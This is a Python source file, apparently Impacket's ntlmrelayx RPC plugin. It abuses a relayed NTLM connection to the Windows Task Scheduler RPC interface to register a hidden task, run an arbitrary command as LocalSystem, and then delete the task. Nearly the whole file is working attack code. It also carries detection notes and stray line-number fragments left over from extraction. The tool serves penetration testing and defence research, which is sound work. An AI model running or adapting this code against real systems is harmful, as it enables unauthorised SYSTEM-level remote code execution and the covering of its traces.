
# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Authors:
#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
#  Based on @agsolino and @_dirkjan code
#


12import time 

13import string 

14import random 

15 

16from impacket import LOG 

17from impacket.dcerpc.v5 import tsch 

18from impacket.dcerpc.v5.dtypes import NULL 

19from impacket.examples.ntlmrelayx.attacks import ProtocolAttack 

20 

# Name of the attack class exported by this module (the RPCAttack class defined below).
PROTOCOL_ATTACK_CLASS = "RPCAttack"

22 

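class TSCHRPCAttack:
    """Run ``self.config.command`` on the relayed host through the Task Scheduler RPC interface.

    Mixin used by :class:`RPCAttack`; it relies on the host class providing
    ``self.dce`` (the relayed DCE/RPC binding), ``self.config.command`` and
    ``self.stringbinding`` (used for logging only). ``_run`` registers a
    hidden task under the root task folder that executes
    ``cmd.exe /C <command>`` as LocalSystem (S-1-5-18), starts it, waits until
    the scheduler records a first run and then deletes the task. Command output
    is not collected ("no output mode").

    Detection notes: the register/delete pair goes through SchRpcRegisterTask
    and SchRpcDelete and is recorded in the Task Scheduler operational log and,
    where auditing of scheduled-task object access is enabled, as Security
    events 4698 (task created) and 4699 (task deleted). The task definition is
    static apart from the 8-letter random task name and the command, so the
    fixed ``StartBoundary`` value, ``Hidden`` = true, the LocalSystem principal
    and a daily calendar trigger immediately followed by SchRpcRun are usable
    fingerprints.
    """

    #: Seconds to sleep between SchRpcGetLastRunInfo polls.
    POLL_INTERVAL = 2
    #: Upper bound (seconds) on waiting for the task to start. The previous
    #: implementation polled forever when the scheduler never ran the task.
    RUN_TIMEOUT = 120

    #: Characters that must not appear raw inside XML text nodes/attributes.
    _XML_ESCAPES = {
        "&": "&amp;",
        '"': "&quot;",
        "'": "&apos;",
        ">": "&gt;",
        "<": "&lt;",
    }

    #: Task definition sent to SchRpcRegisterTask. The two ``%s`` placeholders
    #: receive the XML-escaped command and arguments, in that order.
    _TASK_XML_TEMPLATE = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>%s</Command>
      <Arguments>%s</Arguments>
    </Exec>
  </Actions>
</Task>
"""

    def _xml_escape(self, data):
        """Return ``data`` with the five XML special characters replaced by entity references.

        The operator-supplied command is interpolated into the task XML, so
        this keeps it from altering the task definition (for example closing
        ``<Arguments>`` early) or producing XML the server rejects.
        """
        return ''.join(self._XML_ESCAPES.get(ch, ch) for ch in data)

    def _build_task_xml(self, cmd, args):
        """Return the task definition XML for running ``cmd`` with ``args``.

        Both values are escaped before being placed into the template.
        """
        return self._TASK_XML_TEMPLATE % (self._xml_escape(cmd), self._xml_escape(args))

    def _wait_for_first_run(self, task_path):
        """Poll SchRpcGetLastRunInfo until ``task_path`` has run once.

        Returns True as soon as the last-run timestamp is populated, False
        once ``RUN_TIMEOUT`` seconds have elapsed without a recorded run.
        """
        deadline = time.monotonic() + self.RUN_TIMEOUT
        while True:
            LOG.debug('Calling SchRpcGetLastRunInfo for %s' % task_path)
            resp = tsch.hSchRpcGetLastRunInfo(self.dce, task_path)
            # wYear is 0 until the scheduler has recorded a run of the task.
            if resp['pLastRuntime']['wYear'] != 0:
                return True
            if time.monotonic() >= deadline:
                return False
            time.sleep(self.POLL_INTERVAL)

    def _run(self):
        """Register a throw-away task that runs the configured command, start it, then delete it.

        Raises whatever the ``tsch`` helpers raise (DCE/RPC errors); the task
        is deleted in a ``finally`` so a failure after registration does not
        leave it behind on the host.
        """
        task_name = ''.join(random.choice(string.ascii_letters) for _ in range(8))
        # Tasks live under the root folder; the RPC calls take the full path.
        task_path = '\\%s' % task_name

        cmd = "cmd.exe"
        args = "/C %s" % self.config.command

        LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))

        xml = self._build_task_xml(cmd, args)

        LOG.info('Creating task \\%s' % task_name)
        tsch.hSchRpcRegisterTask(self.dce, task_path, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)

        started = False
        try:
            LOG.info('Running task \\%s' % task_name)
            tsch.hSchRpcRun(self.dce, task_path)

            started = self._wait_for_first_run(task_path)
            if not started:
                LOG.error('Task \\%s did not start within %d seconds' % (task_name, self.RUN_TIMEOUT))
        finally:
            # Always remove the task, even if SchRpcRun or the poll raised;
            # previously any error after registration skipped the deletion.
            LOG.info('Deleting task \\%s' % task_name)
            tsch.hSchRpcDelete(self.dce, task_path)

        if started:
            LOG.info('Completed!')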

106 

107 

class RPCAttack(ProtocolAttack, TSCHRPCAttack):
    """ntlmrelayx attack plugin for a relayed RPC connection.

    The relayed binding is assumed to point at the Task Scheduler endpoint;
    all of the work is delegated to :class:`TSCHRPCAttack`. ``PLUGIN_NAMES``
    is presumably the key under which ntlmrelayx selects this plugin (see
    ``ProtocolAttack``).
    """
    PLUGIN_NAMES = ["RPC"]

    def __init__(self, config, dce, username):
        """Store the relayed DCE/RPC binding and its string binding (used in log lines)."""
        ProtocolAttack.__init__(self, config, dce, username)
        self.dce = dce
        self.rpctransport = dce.get_rpc_transport()
        self.stringbinding = self.rpctransport.get_stringbinding()

    def run(self):
        """Execute the configured command through the TSCH attack; log an error if none was given."""
        # Only the TSCH endpoint is handled for now.
        # TODO: support relaying RPC to different endpoints
        # TODO: support for providing a shell
        # TODO: support for getting an output
        if self.config.command is None:
            LOG.error("No command provided to attack")
            return
        TSCHRPCAttack._run(self)